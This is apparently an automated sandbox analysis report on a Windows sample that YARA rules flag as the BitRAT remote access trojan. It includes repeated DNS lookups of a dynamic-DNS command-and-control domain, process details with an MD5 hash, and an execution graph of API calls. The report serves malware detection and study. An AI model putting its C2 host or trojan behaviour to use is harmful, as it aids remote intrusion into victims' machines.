                          Mar 15, 2022 17:31:10.046315908 CET8.8.8.8192.168.2.40xf41No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.214607000 CET8.8.8.8192.168.2.40xc2bfNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.349523067 CET8.8.8.8192.168.2.40xf0dNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.536420107 CET8.8.8.8192.168.2.40x966cNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.677119017 CET8.8.8.8192.168.2.40x5b22No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:11.325301886 CET8.8.8.8192.168.2.40x8cdfNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:11.501902103 CET8.8.8.8192.168.2.40xb79dNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:13.874360085 CET8.8.8.8192.168.2.40x15f8No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.489401102 CET8.8.8.8192.168.2.40xff23No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.632725954 CET8.8.8.8192.168.2.40x9076No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.763488054 CET8.8.8.8192.168.2.40x8fb9No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.915133953 CET8.8.8.8192.168.2.40x5289No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.045221090 CET8.8.8.8192.168.2.40x128aNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.200653076 CET8.8.8.8192.168.2.40x7387No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.341412067 CET8.8.8.8192.168.2.40x762cNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.493829012 CET8.8.8.8192.168.2.40x7f18No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.627440929 CET8.8.8.8192.168.2.40xadceNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.791873932 CET8.8.8.8192.168.2.40x3026No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.925592899 CET8.8.8.8192.168.2.40xdda9No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.116930008 CET8.8.8.8192.168.2.40x8c49No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.248106003 CET8.8.8.8192.168.2.40xf471No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.396482944 CET8.8.8.8192.168.2.40xff9fNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.529392958 CET8.8.8.8192.168.2.40x7300No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.664040089 CET8.8.8.8192.168.2.40x56aaNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.795887947 CET8.8.8.8192.168.2.40x9ce7No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.941684961 CET8.8.8.8192.168.2.40x89f1No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.079732895 CET8.8.8.8192.168.2.40x3711No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.231422901 CET8.8.8.8192.168.2.40x8c08No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.354827881 CET8.8.8.8192.168.2.40xed4bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.503597021 CET8.8.8.8192.168.2.40x38d5No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.635490894 CET8.8.8.8192.168.2.40xd8f4No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.787503958 CET8.8.8.8192.168.2.40x9e5fNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.919666052 CET8.8.8.8192.168.2.40x6af9No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.058301926 CET8.8.8.8192.168.2.40x97No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.196475029 CET8.8.8.8192.168.2.40x83daNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.331981897 CET8.8.8.8192.168.2.40xa894No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.470560074 CET8.8.8.8192.168.2.40x45ecNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.614809990 CET8.8.8.8192.168.2.40xac40No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.744611025 CET8.8.8.8192.168.2.40x1f0bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.881711006 CET8.8.8.8192.168.2.40x185cNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.013922930 CET8.8.8.8192.168.2.40x3c31No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.178025007 CET8.8.8.8192.168.2.40xd627No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.311510086 CET8.8.8.8192.168.2.40x1ef3No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.467772007 CET8.8.8.8192.168.2.40xa0adNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.607217073 CET8.8.8.8192.168.2.40xe95eNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.739722013 CET8.8.8.8192.168.2.40x5425No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.873919010 CET8.8.8.8192.168.2.40x5fa2No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.023967981 CET8.8.8.8192.168.2.40x99fNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.159403086 CET8.8.8.8192.168.2.40xacdcNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.314868927 CET8.8.8.8192.168.2.40xb2eaNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.482642889 CET8.8.8.8192.168.2.40x456bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.631684065 CET8.8.8.8192.168.2.40xd947No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.762950897 CET8.8.8.8192.168.2.40x7df7No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.897253036 CET8.8.8.8192.168.2.40xe0f0No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.028074026 CET8.8.8.8192.168.2.40x510bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.161334038 CET8.8.8.8192.168.2.40x4ec1No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.295597076 CET8.8.8.8192.168.2.40xfb67No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.490575075 CET8.8.8.8192.168.2.40x22d7No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.622051001 CET8.8.8.8192.168.2.40x26No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.765436888 CET8.8.8.8192.168.2.40xcf5eNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.904874086 CET8.8.8.8192.168.2.40x450eNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.061289072 CET8.8.8.8192.168.2.40xdfe8No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.215473890 CET8.8.8.8192.168.2.40x36f0No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.353543043 CET8.8.8.8192.168.2.40xd46bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.482768059 CET8.8.8.8192.168.2.40x445eNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.633553028 CET8.8.8.8192.168.2.40x6d5bNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.774260044 CET8.8.8.8192.168.2.40xa2b7No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.913913965 CET8.8.8.8192.168.2.40x4737No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.047209978 CET8.8.8.8192.168.2.40x8d02No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.195261955 CET8.8.8.8192.168.2.40xf774No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.324580908 CET8.8.8.8192.168.2.40x1eaaNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.460838079 CET8.8.8.8192.168.2.40xfc55No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.592219114 CET8.8.8.8192.168.2.40x57e1No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.731934071 CET8.8.8.8192.168.2.40xe99cNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.872172117 CET8.8.8.8192.168.2.40xb8b4No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.012712955 CET8.8.8.8192.168.2.40xa0d6No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.564472914 CET8.8.8.8192.168.2.40x85ceNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.700397968 CET8.8.8.8192.168.2.40x7701No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.832451105 CET8.8.8.8192.168.2.40x16cdNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.965207100 CET8.8.8.8192.168.2.40x3472No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:25.102082968 CET8.8.8.8192.168.2.40xbfa8No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)

                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:17:29:20
                          Start date:15/03/2022
                          Path:C:\Users\user\Desktop\mzQcZawXvh.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\mzQcZawXvh.exe"
                          Imagebase:0x400000
                          File size:2180096 bytes
                          MD5 hash:514837C22746AE83FAD96926AD2DDF83
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000000.00000002.257225352.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:1
                          Start time:17:29:23
                          Start date:15/03/2022
                          Path:C:\Users\user\Desktop\mzQcZawXvh.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\mzQcZawXvh.exe"
                          Imagebase:0x400000
                          File size:2180096 bytes
                          MD5 hash:514837C22746AE83FAD96926AD2DDF83
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.245538304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low

                          Reset < >

                            Execution Graph

                            Execution Coverage:2%
                            Dynamic/Decrypted Code Coverage:1.2%
                            Signature Coverage:11.7%
                            Total number of Nodes:863
                            Total number of Limit Nodes:18
                            execution_graph 15835 22fb026 15836 22fb035 15835->15836 15839 22fb7c6 15836->15839 15840 22fb7e1 Module32First 15839->15840 15842 22fb03e 15840->15842 15843 22fb815 15840->15843 15845 22fb485 15843->15845 15846 22fb4b0 15845->15846 15847 22fb4f9 15846->15847 15848 22fb4c1 VirtualAlloc 15846->15848 15847->15847 15848->15847 15881 40b66f 15882 40b67b 15881->15882 15883 40b656 15881->15883 15883->15881 15883->15882 15884 412ce0 __callnewh 6 API calls 15883->15884 15884->15883 15877 40ba7e 15879 40ba95 15877->15879 15878 40bae2 _memset 15879->15878 15880 411a50 __invalid_parameter 16 API calls 15879->15880 15880->15878 15823 40b707 15824 40b71a 15823->15824 15825 40b72f 15823->15825 15824->15825 15826 40c9e0 __CrtCheckMemory 3 API calls 15824->15826 15827 412ed0 __heap_alloc_base 11 API calls 15825->15827 15830 40b7ba _memset 15825->15830 15826->15825 15827->15830 15831 40ba50 15830->15831 15834 40e180 LeaveCriticalSection 15831->15834 15833 40ba4e 15834->15833 14845 40b310 14848 411ca0 14845->14848 14847 40b31a 14849 411ce1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 14848->14849 14850 411cc2 14848->14850 14852 411d43 14849->14852 14850->14849 14851 411cce 14850->14851 14851->14847 14852->14851 14853 410010 14860 4101e0 14853->14860 14855 41001b __initp_misc_winsig __init_pointers 14863 419870 14855->14863 14861 410110 __encode_pointer 7 API calls 14860->14861 14862 4101ec 14861->14862 14862->14855 14864 410110 __encode_pointer 7 API calls 14863->14864 14865 41007b 14864->14865 14866 410110 TlsGetValue 14865->14866 14867 410157 14866->14867 14868 41012f 14866->14868 14878 4101b0 GetModuleHandleW 14867->14878 14868->14867 14869 410138 TlsGetValue 14868->14869 14872 41014e 14869->14872 14872->14867 14875 410181 14872->14875 14873 41016d GetProcAddress 14874 41017f 14873->14874 14874->14875 14876 410193 RtlEncodePointer 14875->14876 14877 410088 14875->14877 14876->14877 14879 4101ce 14878->14879 14881 410161 14878->14881 14882 40fa60 14879->14882 14881->14873 14881->14874 14883 40fa76 14882->14883 14884 40faa8 14883->14884 14885 40fa7c Sleep GetModuleHandleW 14883->14885 14884->14881 14885->14883 14885->14884 15849 40a039 15850 40a040 15849->15850 15851 40a04d 17 API calls 15850->15851 15854 40a142 15850->15854 15851->15850 15852 40a16a GetLastError GetCharWidthA 15852->15854 15853 40a187 GetConsoleAliasesLengthA WinHttpConnect AlphaBlend 15853->15854 15854->15852 15854->15853 15855 40a1df GetComputerNameW 15854->15855 15856 40a1ff 15854->15856 15855->15854 15857 40a23f 30 API calls 15856->15857 15858 40a3cd 15856->15858 15857->15856 15875 409d30 LocalAlloc 15858->15875 15860 40a3e9 SetThreadAffinityMask 15861 40a3d2 15860->15861 15861->15860 15862 40a40c 15861->15862 15863 40a43c FreeEnvironmentStringsA 15862->15863 15864 40a44d 7 API calls 15862->15864 15865 40a4ab 15862->15865 15863->15862 15864->15862 15866 40a4c4 15865->15866 15867 40a4b5 15865->15867 15876 409c70 LoadLibraryA VirtualProtect 15866->15876 15867->15866 15868 409b30 14 API calls 15867->15868 15868->15867 15870 40a4c9 15871 409d50 47 API calls 15870->15871 15872 40a4ce 15871->15872 15873 40a5cb 15872->15873 15874 40a4df 18 API calls 15872->15874 15874->15873 15875->15861 15876->15870 17450 411594 17458 41159b 17450->17458 17451 41199b SetHandleCount 17462 4115bc 17451->17462 17452 411853 17452->17451 17453 41194c 17452->17453 17454 4118be GetStdHandle 17452->17454 17453->17451 17453->17462 17454->17453 17455 4118d8 17454->17455 17455->17453 17456 4118e2 GetFileType 17455->17456 17456->17453 17457 4118f5 17456->17457 17459 417180 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 17457->17459 17458->17452 17460 4117e1 GetFileType 17458->17460 17461 417180 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 17458->17461 17458->17462 17459->17453 17460->17458 17461->17458 14886 40b3a5 14887 40b3b1 _check_managed_app 14886->14887 14914 412960 HeapCreate 14887->14914 14891 40b3c9 14892 40b510 _fast_error_exit 3 API calls 14891->14892 14893 40b3dc __RTC_Initialize 14891->14893 14892->14893 14925 411520 GetStartupInfoA 14893->14925 14895 40b3fa 14896 40b408 GetCommandLineA 14895->14896 14938 4126c0 14896->14938 14900 40b422 14963 412090 14900->14963 14902 40b435 14970 40fac0 14902->14970 14904 40b44a 14976 411fc0 14904->14976 14906 40b467 14980 409fd0 14906->14980 14909 40b4a8 15018 40fba0 14909->15018 14910 40b496 14910->14909 15015 40fb60 14910->15015 14915 40b3bb 14914->14915 14916 41298e __heap_init 14914->14916 14915->14891 14921 40b510 14915->14921 14916->14915 14917 4129a1 14916->14917 15021 413ca0 HeapAlloc 14917->15021 14920 4129b2 HeapDestroy 14920->14915 14922 40b51e 14921->14922 15023 40ffb0 14922->15023 14924 40b539 14924->14891 14933 41159b 14925->14933 14926 4115bc 14926->14895 14927 41199b SetHandleCount 14927->14926 14928 411853 14928->14927 14929 4118be GetStdHandle 14928->14929 14936 41194c 14928->14936 14930 4118d8 14929->14930 14929->14936 14931 4118e2 GetFileType 14930->14931 14930->14936 14932 4118f5 14931->14932 14931->14936 14934 417180 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 14932->14934 14933->14926 14933->14928 14935 4117e1 GetFileType 14933->14935 15029 417180 InitializeCriticalSectionAndSpinCount 14933->15029 14934->14936 14935->14933 14936->14926 14936->14927 14939 4126ee 14938->14939 14940 4126df GetEnvironmentStringsW 14938->14940 14942 41271c 14939->14942 14943 41280f 14939->14943 14940->14939 14941 4126fa GetLastError 14940->14941 14941->14939 14944 412722 GetEnvironmentStringsW 14942->14944 14948 412738 WideCharToMultiByte 14942->14948 14945 41282b GetEnvironmentStrings 14943->14945 14946 40b418 14943->14946 14951 412841 14943->14951 14944->14946 14944->14948 14945->14946 14945->14951 14958 412230 14946->14958 14949 4127b5 FreeEnvironmentStringsW 14948->14949 14950 412797 14948->14950 14949->14946 14950->14949 14952 4127c6 WideCharToMultiByte 14950->14952 14953 4128aa __fwrite_nolock 14951->14953 14954 41289c FreeEnvironmentStringsA 14951->14954 14955 4127e8 14952->14955 14956 4127fd FreeEnvironmentStringsW 14952->14956 14957 4128bb FreeEnvironmentStringsA 14953->14957 14954->14946 14955->14956 14956->14946 14957->14946 14959 412248 14958->14959 14960 41224d GetModuleFileNameA 14958->14960 15031 416320 14959->15031 14962 412270 ___setargv _parse_cmdline 14960->14962 14962->14900 14964 4120a1 14963->14964 14968 4120a6 _strlen 14963->14968 14965 416320 ___initmbctable 48 API calls 14964->14965 14965->14968 14966 4120bb 14966->14902 14968->14966 15170 40d960 14968->15170 15180 40dde0 14968->15180 14972 40facf __IsNonwritableInCurrentImage 14970->14972 15206 419820 14972->15206 14973 40faf2 __initterm_e 14975 40fb0d __IsNonwritableInCurrentImage __initterm 14973->14975 15210 40ac70 14973->15210 14975->14904 14977 411fd8 14976->14977 14979 411fdd __wincmdln 14976->14979 14978 416320 ___initmbctable 48 API calls 14977->14978 14978->14979 14979->14906 14981 409fda ___crtMessageWindowW 14980->14981 14982 40a012 14981->14982 15442 40b210 DeleteFileA 14981->15442 14984 40a04d 17 API calls 14982->14984 14994 40a142 14982->14994 14984->14982 14985 409fed 15445 40afc0 14985->15445 14990 40a16a GetLastError GetCharWidthA 14990->14994 14991 40ac70 _atexit 57 API calls 14993 40a004 _malloc 14991->14993 14992 40a187 GetConsoleAliasesLengthA WinHttpConnect AlphaBlend 14992->14994 15482 40a930 14993->15482 14994->14990 14994->14992 14996 40a1df GetComputerNameW 14994->14996 14997 40a1ff 14994->14997 14996->14994 14998 40a23f 30 API calls 14997->14998 14999 40a3cd 14997->14999 14998->14997 15495 409d30 LocalAlloc 14999->15495 15001 40a3e9 SetThreadAffinityMask 15002 40a3d2 15001->15002 15002->15001 15003 40a40c 15002->15003 15004 40a43c FreeEnvironmentStringsA 15003->15004 15005 40a44d 7 API calls 15003->15005 15006 40a4ab 15003->15006 15004->15003 15005->15003 15007 40a4c4 15006->15007 15496 409b30 15006->15496 15499 409c70 LoadLibraryA VirtualProtect 15007->15499 15010 40a4c9 15500 409d50 15010->15500 15013 40a5cb 15013->14910 15014 40a4df 18 API calls 15014->15013 15725 40fd70 15015->15725 15019 40fd70 _doexit 28 API calls 15018->15019 15020 40b4ad 15019->15020 15022 4129ab 15021->15022 15022->14915 15022->14920 15026 40ff70 GetModuleHandleW 15023->15026 15027 40ffa4 ExitProcess 15026->15027 15028 40ff8c GetProcAddress 15026->15028 15028->15027 15030 417211 15029->15030 15030->14933 15032 416335 15031->15032 15033 41632e 15031->15033 15032->14960 15035 415780 15033->15035 15036 4157be 15035->15036 15052 415670 15036->15052 15038 4157c6 15060 415a20 15038->15060 15040 4157d8 15046 4159bc 15040->15046 15066 415b30 15040->15066 15043 415849 InterlockedDecrement 15044 415877 InterlockedIncrement 15043->15044 15045 41585a 15043->15045 15044->15046 15048 41589c 15044->15048 15045->15044 15046->15032 15047 415970 InterlockedDecrement 15049 415981 15047->15049 15050 41599d InterlockedIncrement 15047->15050 15048->15046 15048->15047 15049->15050 15079 4159be 15050->15079 15053 4156a7 15052->15053 15054 41573f 15053->15054 15055 415733 15053->15055 15056 4156f0 InterlockedDecrement 15053->15056 15057 415715 InterlockedIncrement 15053->15057 15054->15038 15082 415741 15055->15082 15056->15057 15059 4156fe 15056->15059 15057->15055 15059->15057 15061 415a5a 15060->15061 15062 415a71 GetOEMCP 15061->15062 15063 415a9a 15061->15063 15065 415a93 __mbtowc_l _LocaleUpdate::~_LocaleUpdate 15062->15065 15064 415aa0 GetACP 15063->15064 15063->15065 15064->15065 15065->15040 15067 415a20 getSystemCP 2 API calls 15066->15067 15068 415b4c 15067->15068 15069 415cc7 15068->15069 15074 415b58 __setmbcp_nolock 15068->15074 15075 415b9c __setmbcp_nolock 15068->15075 15072 415ce4 IsValidCodePage 15069->15072 15069->15074 15071 415839 15071->15043 15071->15046 15073 415cfb GetCPInfo 15072->15073 15072->15074 15073->15074 15077 415d11 __setmbcp_nolock 15073->15077 15094 416ca0 15074->15094 15086 415fe0 GetCPInfo 15075->15086 15078 415fe0 setSBUpLow 37 API calls 15077->15078 15078->15074 15169 40e180 LeaveCriticalSection 15079->15169 15081 4159c5 15081->15046 15085 40e180 LeaveCriticalSection 15082->15085 15084 415748 15084->15054 15085->15084 15087 416011 ___crtLCMapStringW 15086->15087 15088 41615c 15086->15088 15102 41b4b0 15087->15102 15089 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15088->15089 15090 416318 15089->15090 15090->15074 15092 416125 15093 41b4b0 ___crtLCMapStringA 36 API calls 15092->15093 15093->15088 15095 416ca8 15094->15095 15096 416caa IsDebuggerPresent 15094->15096 15095->15071 15168 413410 15096->15168 15099 41cbcf SetUnhandledExceptionFilter UnhandledExceptionFilter 15100 41cbf8 GetCurrentProcess TerminateProcess 15099->15100 15101 41cbee __invalid_parameter 15099->15101 15100->15071 15101->15100 15103 41b4c4 __mbtowc_l 15102->15103 15106 41b510 15103->15106 15105 41b4f2 _LocaleUpdate::~_LocaleUpdate 15105->15092 15107 41b521 LCMapStringW 15106->15107 15110 41b53d strncnt 15106->15110 15108 41b549 GetLastError 15107->15108 15107->15110 15108->15110 15109 41b5a6 15136 420cd0 GetLocaleInfoA 15109->15136 15110->15109 15111 41b7a2 15110->15111 15113 41b7d5 MultiByteToWideChar 15111->15113 15125 41b5f2 __freea 15111->15125 15124 41b80c __MarkAllocaS _malloc 15113->15124 15113->15125 15115 41b605 15142 420d30 15115->15142 15116 41b749 LCMapStringA 15116->15125 15118 41b862 MultiByteToWideChar 15119 41b88c LCMapStringW 15118->15119 15118->15125 15121 41b8b9 15119->15121 15119->15125 15123 41b8c4 15121->15123 15133 41b90d __MarkAllocaS _malloc 15121->15133 15122 41b631 LCMapStringA 15122->15125 15128 41b66b _memset __MarkAllocaS _malloc 15122->15128 15123->15125 15126 41b8dc LCMapStringW 15123->15126 15124->15118 15124->15125 15125->15105 15126->15125 15127 41b966 LCMapStringW 15127->15125 15129 41b98c 15127->15129 15128->15125 15132 41b6ca LCMapStringA 15128->15132 15130 41b992 WideCharToMultiByte 15129->15130 15131 41b9bd WideCharToMultiByte 15129->15131 15130->15125 15131->15125 15132->15125 15134 41b6fd 15132->15134 15133->15125 